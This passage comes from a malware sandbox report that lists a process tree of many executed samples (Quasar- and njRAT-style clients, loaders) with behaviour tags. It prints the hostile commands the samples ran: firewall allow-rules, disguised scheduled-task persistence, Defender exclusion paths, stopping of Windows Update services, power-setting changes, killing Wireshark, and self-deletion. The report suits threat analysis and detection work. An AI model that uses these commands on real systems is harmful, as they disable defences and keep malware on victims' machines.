C:\Users\Admin\Desktop\mal-2\a\38.exe"C:\Users\Admin\Desktop\mal-2\a\38.exe"3⤵PID:10892
-
-
C:\Users\Admin\Desktop\mal-2\a\16.exe"C:\Users\Admin\Desktop\mal-2\a\16.exe"3⤵PID:6812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 3964⤵
- Program crash
PID:1740
-
-
-
C:\Users\Admin\Desktop\mal-2\a\2.exe"C:\Users\Admin\Desktop\mal-2\a\2.exe"3⤵PID:8484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8484 -s 3964⤵
- Program crash
PID:9340
-
-
-
C:\Users\Admin\Desktop\mal-2\a\25.exe"C:\Users\Admin\Desktop\mal-2\a\25.exe"3⤵PID:5680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 3964⤵
- Program crash
PID:7744
-
-
-
C:\Users\Admin\Desktop\mal-2\a\svchost.exe"C:\Users\Admin\Desktop\mal-2\a\svchost.exe"3⤵PID:10784
-
-
C:\Users\Admin\Desktop\mal-2\a\systemetape.exe"C:\Users\Admin\Desktop\mal-2\a\systemetape.exe"3⤵PID:12116
-
-
C:\Users\Admin\Desktop\mal-2\a\systemsound.exe"C:\Users\Admin\Desktop\mal-2\a\systemsound.exe"3⤵PID:12540
-
-
C:\Users\Admin\Desktop\mal-2\a\Microsoft_Hardware_Launch.exe"C:\Users\Admin\Desktop\mal-2\a\Microsoft_Hardware_Launch.exe"3⤵PID:4228
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\Microsoft_Hardware_Launch.exe" "Microsoft_Hardware_Launch.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:14096
-
-
-
C:\Users\Admin\Desktop\mal-2\a\lastest.exe"C:\Users\Admin\Desktop\mal-2\a\lastest.exe"3⤵PID:10384
-
-
C:\Users\Admin\Desktop\mal-2\a\heo.exe"C:\Users\Admin\Desktop\mal-2\a\heo.exe"3⤵PID:3460
-
-
C:\Users\Admin\Desktop\mal-2\a\Server1.exe"C:\Users\Admin\Desktop\mal-2\a\Server1.exe"3⤵PID:7548
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\Server1.exe" "Server1.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:732
-
-
-
C:\Users\Admin\Desktop\mal-2\a\856.exe"C:\Users\Admin\Desktop\mal-2\a\856.exe"3⤵PID:8900
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\856.exe" "856.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:2764
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\Desktop\mal-2\a\856.exe"4⤵
- Modifies Windows Firewall
PID:7336
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\856.exe" "856.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:13932
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"4⤵PID:7232
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:11932
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"5⤵
- Modifies Windows Firewall
PID:7152
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:9384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:788
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 13165⤵PID:8160
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\newest.exe"C:\Users\Admin\Desktop\mal-2\a\newest.exe"3⤵PID:10488
-
-
C:\Users\Admin\Desktop\mal-2\a\client.exe"C:\Users\Admin\Desktop\mal-2\a\client.exe"3⤵PID:12216
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\client.exe" "client.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:10396
-
-
-
C:\Users\Admin\Desktop\mal-2\a\ServerRat.exe"C:\Users\Admin\Desktop\mal-2\a\ServerRat.exe"3⤵PID:9728
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\ServerRat.exe" "ServerRat.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:9140
-
-
-
C:\Users\Admin\Desktop\mal-2\a\govno__dlya_jertwy.exe"C:\Users\Admin\Desktop\mal-2\a\govno__dlya_jertwy.exe"3⤵PID:6584
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\govno__dlya_jertwy.exe" "govno__dlya_jertwy.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:11976
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Bloxflip%20Predictor.exe"C:\Users\Admin\Desktop\mal-2\a\Bloxflip%20Predictor.exe"3⤵PID:3988
-
-
C:\Users\Admin\Desktop\mal-2\a\Fast%20Download.exe"C:\Users\Admin\Desktop\mal-2\a\Fast%20Download.exe"3⤵PID:11760
-
-
C:\Users\Admin\Desktop\mal-2\a\Server.exe"C:\Users\Admin\Desktop\mal-2\a\Server.exe"3⤵PID:3176
-
C:\Users\Admin\server.exe"C:\Users\Admin\server.exe"4⤵PID:7916
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:9204
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\fusca%20game.exe"C:\Users\Admin\Desktop\mal-2\a\fusca%20game.exe"3⤵PID:9504
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\fusca%20game.exe" "fusca%20game.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:6728
-
-
-
C:\Users\Admin\Desktop\mal-2\a\enai2.exe"C:\Users\Admin\Desktop\mal-2\a\enai2.exe"3⤵PID:12428
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\enai2.exe" "enai2.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:2912
-
-
-
C:\Users\Admin\Desktop\mal-2\a\njrat.exe"C:\Users\Admin\Desktop\mal-2\a\njrat.exe"3⤵PID:6364
-
C:\Windows\rundll32.exe"C:\Windows\rundll32.exe"4⤵PID:14140
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:14544
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\joiner.exe"C:\Users\Admin\Desktop\mal-2\a\joiner.exe"3⤵PID:9400
-
-
C:\Users\Admin\Desktop\mal-2\a\testme.exe"C:\Users\Admin\Desktop\mal-2\a\testme.exe"3⤵PID:12124
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\testme.exe" "testme.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:13076
-
-
-
C:\Users\Admin\Desktop\mal-2\a\sela.exe"C:\Users\Admin\Desktop\mal-2\a\sela.exe"3⤵PID:1544
-
-
C:\Users\Admin\Desktop\mal-2\a\444.exe"C:\Users\Admin\Desktop\mal-2\a\444.exe"3⤵PID:13164
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵PID:10896
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:10468
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\main.exe"C:\Users\Admin\Desktop\mal-2\a\main.exe"3⤵PID:11020
-
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"4⤵PID:5552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:13572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:6908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:10912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:12252
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:5644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:15004
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "C:\Users\Admin\Desktop\mal-2\a\main.exe"4⤵PID:4068
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 55⤵PID:10280
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\startup.exe"C:\Users\Admin\Desktop\mal-2\a\startup.exe"3⤵PID:6344
-
-
C:\Users\Admin\Desktop\mal-2\a\cnct.exe"C:\Users\Admin\Desktop\mal-2\a\cnct.exe"3⤵PID:13280
-
C:\Users\Admin\AppData\Local\Temp\dlscord.exe"C:\Users\Admin\AppData\Local\Temp\dlscord.exe"4⤵PID:7976
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\dlscord.exe" "dlscord.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:9668
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\mos%20ssssttttt.exe"C:\Users\Admin\Desktop\mal-2\a\mos%20ssssttttt.exe"3⤵PID:5092
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7820
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\Desktop\mal-2\a\mos%20ssssttttt.exe"4⤵
- Modifies Windows Firewall
PID:5152
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\mal-2\a\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:11584
-
-
-
C:\Users\Admin\Desktop\mal-2\a\njSilent.exe"C:\Users\Admin\Desktop\mal-2\a\njSilent.exe"3⤵PID:2908
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe"4⤵PID:956
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:14688
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\system.exe"C:\Users\Admin\Desktop\mal-2\a\system.exe"3⤵PID:14764
-
C:\Users\Admin\AppData\Local\Temp\system.exe"C:\Users\Admin\AppData\Local\Temp\system.exe"4⤵PID:7388
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:14736
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\eo.exe"C:\Users\Admin\Desktop\mal-2\a\eo.exe"3⤵PID:7176
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\Desktop\mal-2\a\eo.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:14776
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Client-built.exe"C:\Users\Admin\Desktop\mal-2\a\Client-built.exe"3⤵PID:5576
-
-
C:\Users\Admin\Desktop\mal-2\a\rektupp.exe"C:\Users\Admin\Desktop\mal-2\a\rektupp.exe"3⤵PID:6088
-
-
C:\Users\Admin\Desktop\mal-2\a\svhost.exe"C:\Users\Admin\Desktop\mal-2\a\svhost.exe"3⤵PID:13436
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6984
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Java32.exe"C:\Users\Admin\Desktop\mal-2\a\Java32.exe"3⤵PID:9804
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:8804
-
-
-
C:\Users\Admin\Desktop\mal-2\a\x.exe"C:\Users\Admin\Desktop\mal-2\a\x.exe"3⤵PID:7908
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "x" /sc ONLOGON /tr "C:\Windows\system32\SubDir\x.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:13200
-
-
-
C:\Users\Admin\Desktop\mal-2\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\mal-2\a\RuntimeBroker.exe"3⤵PID:14480
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"4⤵PID:11444
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lc3KunYBUPFp.bat" "5⤵PID:13836
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:4992
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13724
-
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"6⤵PID:12192
-
-
-
-
-
C:\Users\Admin\Desktop\mal-2\a\test.exe"C:\Users\Admin\Desktop\mal-2\a\test.exe"3⤵PID:8852
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4052
-
-
-
C:\Users\Admin\Desktop\mal-2\a\vanilla.exe"C:\Users\Admin\Desktop\mal-2\a\vanilla.exe"3⤵PID:3992
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2828
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Java.exe"C:\Users\Admin\Desktop\mal-2\a\Java.exe"3⤵PID:4068
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:8196
-
-
-
C:\Users\Admin\Desktop\mal-2\a\skibidi.exe"C:\Users\Admin\Desktop\mal-2\a\skibidi.exe"3⤵PID:2716
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9524
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Client-base.exe"C:\Users\Admin\Desktop\mal-2\a\Client-base.exe"3⤵PID:13380
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:12708
-
-
-
C:\Users\Admin\Desktop\mal-2\a\example_win32_dx11.exe"C:\Users\Admin\Desktop\mal-2\a\example_win32_dx11.exe"3⤵PID:7832
-
-
C:\Users\Admin\Desktop\mal-2\a\jignesh.exe"C:\Users\Admin\Desktop\mal-2\a\jignesh.exe"3⤵PID:13520
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:8956
-
-
-
C:\Users\Admin\Desktop\mal-2\a\koptlyyasdrt.exe"C:\Users\Admin\Desktop\mal-2\a\koptlyyasdrt.exe"3⤵PID:15272
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9324
-
-
-
C:\Users\Admin\Desktop\mal-2\a\SGVP%20Client%20program.exe"C:\Users\Admin\Desktop\mal-2\a\SGVP%20Client%20program.exe"3⤵PID:9380
-
-
C:\Users\Admin\Desktop\mal-2\a\Windows12.exe"C:\Users\Admin\Desktop\mal-2\a\Windows12.exe"3⤵PID:2812
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "winlogson" /sc ONLOGON /tr "C:\Windows\system32\winlogson\winlogson.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:14992
-
-
-
C:\Users\Admin\Desktop\mal-2\a\CollosalLoader.exe"C:\Users\Admin\Desktop\mal-2\a\CollosalLoader.exe"3⤵PID:7056
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Skype" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\MSWinpreference.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7564
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Runtime%20Broker.exe"C:\Users\Admin\Desktop\mal-2\a\Runtime%20Broker.exe"3⤵PID:14312
-
-
C:\Users\Admin\Desktop\mal-2\a\Neverlose%20Loader.exe"C:\Users\Admin\Desktop\mal-2\a\Neverlose%20Loader.exe"3⤵PID:13540
-
-
C:\Users\Admin\Desktop\mal-2\a\CleanerV2.exe"C:\Users\Admin\Desktop\mal-2\a\CleanerV2.exe"3⤵PID:8532
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "CleanerV2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:13356
-
-
-
C:\Users\Admin\Desktop\mal-2\a\sharpmonoinjector.exe"C:\Users\Admin\Desktop\mal-2\a\sharpmonoinjector.exe"3⤵PID:5836
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jBMEDjGni80m.bat" "4⤵PID:7584
-
-
-
C:\Users\Admin\Desktop\mal-2\a\Registry.exe"C:\Users\Admin\Desktop\mal-2\a\Registry.exe"3⤵PID:9784
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9420
-
-
-
C:\Users\Admin\Desktop\mal-2\a\spectrum.exe"C:\Users\Admin\Desktop\mal-2\a\spectrum.exe"3⤵PID:7024
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\mal-2\a\spectrum.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:7484
-
-
-
C:\Users\Admin\Desktop\mal-2\a\SGVP%20Client%20System.exe"C:\Users\Admin\Desktop\mal-2\a\SGVP%20Client%20System.exe"3⤵PID:6056
-
-
C:\Users\Admin\Desktop\mal-2\a\CondoGenerator.exe"C:\Users\Admin\Desktop\mal-2\a\CondoGenerator.exe"3⤵PID:1456
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6856
-
-
-
C:\Users\Admin\Desktop\mal-2\a\lmao.exe"C:\Users\Admin\Desktop\mal-2\a\lmao.exe"3⤵PID:8844
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5580
-
-
-
C:\Users\Admin\Desktop\mal-2\a\MMO%201.exe"C:\Users\Admin\Desktop\mal-2\a\MMO%201.exe"3⤵PID:3264
-
-
C:\Users\Admin\Desktop\mal-2\a\fud2.exe"C:\Users\Admin\Desktop\mal-2\a\fud2.exe"3⤵PID:3256
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3988
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3088
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5000
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3576
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1404
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4524
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineCPS"2⤵PID:5692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5700
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5920
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3612
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4552
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1316
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:200
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5168
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5264
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:3832
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:5724
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:5736
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:6068
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5768
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:236
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4588 -
